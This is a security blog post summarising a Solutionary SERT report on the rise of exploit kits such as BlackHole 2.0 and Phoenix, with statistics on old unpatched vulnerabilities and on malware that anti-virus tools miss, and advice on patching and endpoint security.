The rise of exploit kits according to Solutionary SERT

Today I desire to discuss about a very interesting study by Solutionary’s Security Engineering Research Team (SERT) that shared the results related an analysis on malware and exploit kits diffusion observed with its solution ActiveGuard service platform.

The platform has collected and analyzed malicious events that hit company clients globally, the data have been provided to SERT to paint overall threat landscape. The study revealed that despite there was a 15% drop in event volume in the categories of Authentication Security, Distributed Denial of Service (DDoS) and Reconnaissance,  the cyber threat represented by exploit kits is increasing the incidence.

The report revealed the surprising efficiency of well-known vulnerabilities usually included in the popular exploit s sold in the underground, around 60% of total are more than two years old, and 70% the exploit kits analyzed (26)  were released or created in Russia.

The data is meaningful if it is considered that second place is occupied by the China with 7.7%, most popular and pervasive exploit kit is BlackHole 2.0 that exploits fewer vulnerabilities than other kits do, meanwhile most versatile of these is Phoenix exploit kit that supports 16 % percent of all vulnerabilities being exploited. Over 18% of the malware instance detected were directly attributed to The BlackHole exploit kit that is a web application that exploit known vulnerabilities in most popular applications, frameworks and browsers such as Adobe Reader, Adobe Flash and Java.

The data highlights the inadequacy of patch management process of private businesses  that don’t update their systems rapidly, in many cases entire infrastructures aren’t updated for long time for this reason there are still vulnerable to old exploit code dated back to 2004.

The phenomenon is really worrying, cyber security is crucial for the existence of any company and for all the business partners, we are facing with the lack of security culture, the security is still perceived as a cost and global crisis is aggravating the situation.

The report states

“SERT continuously performs batch analysis of malware variants received through various means, with much of the intense examination being left for particularly serious threats. As indicated by the accompanying chart, a majority (67%) of malware is not detected by anti-virus or anti-malware software. Although specific insights require close examination, trending from batch analysis can often provide a high-level perspective that is critical for strategic enterprise security planning. “

The use of exploit kit is also demonstrated by data related to the number of instances detected, 30% of the samples analyzed were traced back to JavaScript malware variants used for redirection, obfuscation and encryption, all functionality provided by the popular malicious kit.

The figures are very worrying, with an impressive frequency new vulnerabilities are discovered ,the trend observed in recent months demonstrates a market very active and prolific for the commercialization of 0-day vulnerabilities, in many cases dedicated exploit kits are sold directly in the underground market, once again the Russian underground is the most active in this sense.

“With a large concentration of exploit kits focusing on client-side exploitation (targeting desktop and end-user applications), organizations must pay close attention to patch management and endpoint security controls. Although these controls alone will not stop all attacks, they will significantly decrease the attack surface and reduce the overall likelihood of compromise.”

As revealed in the report, a large number of exploit kits focus on client-side exploitation (targeting browsers, desktop and end-user applications). For this reason alone, companies, organizations, and individual users, should pay close attention to keeping their security patches and antivirus software up to date.

Pierluigi Paganini